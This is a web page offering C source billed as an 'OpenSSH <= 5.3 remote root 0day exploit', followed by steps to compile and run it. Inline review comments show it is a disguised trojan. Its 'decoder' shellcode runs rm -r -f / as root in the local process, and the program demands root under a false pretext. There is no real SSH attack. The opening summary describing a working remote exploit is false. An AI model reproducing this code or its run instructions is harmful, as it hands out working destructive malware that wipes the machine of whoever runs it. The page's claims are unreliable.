Openssh Exploit

This document contains source code for a remote exploit that targets a vulnerability in OpenSSH versions 5.3 and below to gain root access on Linux systems. It connects to the target system on port 22, sends an encoded payload containing an exploit and root shell code, and if successful executes a root shell. The document provides instructions on how to compile and run the exploit code.


/*

*
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
*
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include

<stdio.h>
<netdb.h>
<stdlib.h>
<string.h>
<unistd.h>
<arpa/inet.h>
<sys/types.h>
<sys/socket.h>
<netinet/in.h>

/*
 * Print the program banner and usage line, then terminate the process.
 *
 * argv[0] is used as the program name in the usage line; no other entry of
 * argv is read. Never returns: always exits with status 1.
 *
 * NOTE(review): the banner advertises <target> and <port> arguments, but
 * main() in this file never reads argv[1] or argv[2].
 */
void usage(char *argv[])
{
    const char *prog = argv[0];

    fputs("\n\t[+] HATSUNEMIKU\n", stdout);
    fputs("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n", stdout);
    fputs("\t[+] Keep this 0day priv8!\n", stdout);
    fprintf(stdout, "\t[+] usage: %s <target> <port>\n\n", prog);
    exit(1);
}
/*
 * "decoder": 32-bit x86 Linux machine code. It decodes nothing. Read byte by
 * byte it is:
 *   push 0x0b ; pop eax                     eax = 11 (sys_execve)
 *   cdq ; push edx                          edx = 0, NULL pushed
 *   push '/'     ; mov edi, esp             edi -> "/"
 *   pushw "-f"   ; mov esi, esp             esi -> "-f"
 *   pushw "-r"   ; mov ecx, esp             ecx -> "-r"
 *   push "//rm" ; push "/bin" ; mov ebx, esp  ebx -> "/bin//rm"
 *   push 0 ; push edi ; push esi ; push ecx ; push ebx ; mov ecx, esp
 *   int 0x80
 * i.e. execve("/bin//rm", {"/bin//rm", "-r", "-f", "/", NULL}, NULL).
 * main() casts this array to a function pointer and calls it in the LOCAL
 * process (which main() has already required to be root) on the
 * gethostbyname() failure path. This is the program's real payload.
 */
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
/*
 * "rootshell": 32-bit x86 Linux machine code that does NOT spawn a shell.
 * Decoded: it pushes the 10-byte string "fu" + "ck y" + "ou!\n" onto the
 * stack, calls write(1, buf, 10) (eax = 4), then exit (eax = 1). It is only
 * ever memcpy'd into the send buffer by main(); this program never executes
 * it. The string literal is broken across two lines at "\x6b" — that is a
 * page-extraction artefact, not part of the original source.
 */
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b
"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
/*
 * Entry point. Despite the banner there is no SSH protocol handling anywhere
 * in this function: argv[1] and argv[2] are never read, the "target" buffer
 * h is never written, the port is hard-coded, and the only bytes ever sent
 * are a copy of the rootshell array (which just prints a taunt). The branch
 * that actually matters is the gethostbyname() failure path, which calls the
 * "decoder" byte array as code inside THIS process — after the program has
 * insisted on running as root. Net effect: a local destructive trojan
 * (execve of /bin/rm -r -f /) dressed up as a remote exploit.
 */
int main(int argc, char **argv)
{
    int euid = geteuid();
    int port= 22, sock;       /* port is fixed at 22; argv[2] is never consulted */
    char h[1000];             /* never assigned — read uninitialised by inet_aton() below */
    struct hostent *host;
    struct sockaddr_in addr;  /* only sin_addr/sin_port/sin_family are ever set */
    /* Demands root. The stated reason is false: the only socket this program
       creates is SOCK_STREAM (below), which needs no privilege. The practical
       effect is that the decoder payload, when reached, runs as uid 0. */
    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)   /* always true here — the branch above has already exited otherwise */
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");

    }
    if(argc != 3)
        usage(argv);
    /* h holds whatever was on the stack, so inet_aton() will normally fail and
       gethostbyname() is handed garbage. When that lookup also fails — the
       expected outcome for random bytes — the decoder array is cast to a
       function pointer and CALLED in this process: execve("/bin//rm",
       "-r", "-f", "/") as root. Nothing about the remote host is involved.
       (If the data segment is not executable the indirect call faults instead;
       the intent is unchanged.) */
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();   /* trojan trigger: local rm -r -f / as root */
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;   /* h_addr_list[0], unchecked */
    }
    sock = socket(PF_INET, SOCK_STREAM, 0);   /* return value never checked */
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
    {
        fprintf(stderr,"[-] Exploit failed.\n");
        exit(1);
    }
    char payload[1337];
    /* Both memcpy()s write at offset 0, so the second overwrites the first and
       the decoder bytes never reach the wire. strlen() on machine code stops
       at the first zero byte — here the NUL terminating rootshell — so the
       send() length is sizeof(rootshell) - 1, not the intended payload size. */
    memcpy(payload, &decoder, sizeof(decoder));
    memcpy(payload, &rootshell, sizeof(rootshell));
    send(sock, payload, strlen(payload),0);
    close(sock);
    /* sock was just closed, so this connect() fails (EBADF) every time and the
       "[+]Got shell!" branch below cannot be reached. Even if it were,
       system("/bin/bash") only starts a shell on the local machine; no
       remote session exists. */
    if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
    {
        fprintf(stderr, "[-] Exploit failed.\n");
        exit(1);
    }
    else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
    {
        fprintf(stdout, "[+]Got shell!\n");
        system("/bin/bash");   /* local shell, not a remote one */
    }
    else
    {
        fprintf(stderr, "[-] Exploit failed.\n");
        close(sock);
        exit(0);
    }
}
P.S. for people who don't use linux:
1.) Save as (yourexploit).c
2.) Compile with gcc. Example: gcc yourexploit.c
3.) Execute it. Example: ./a.out
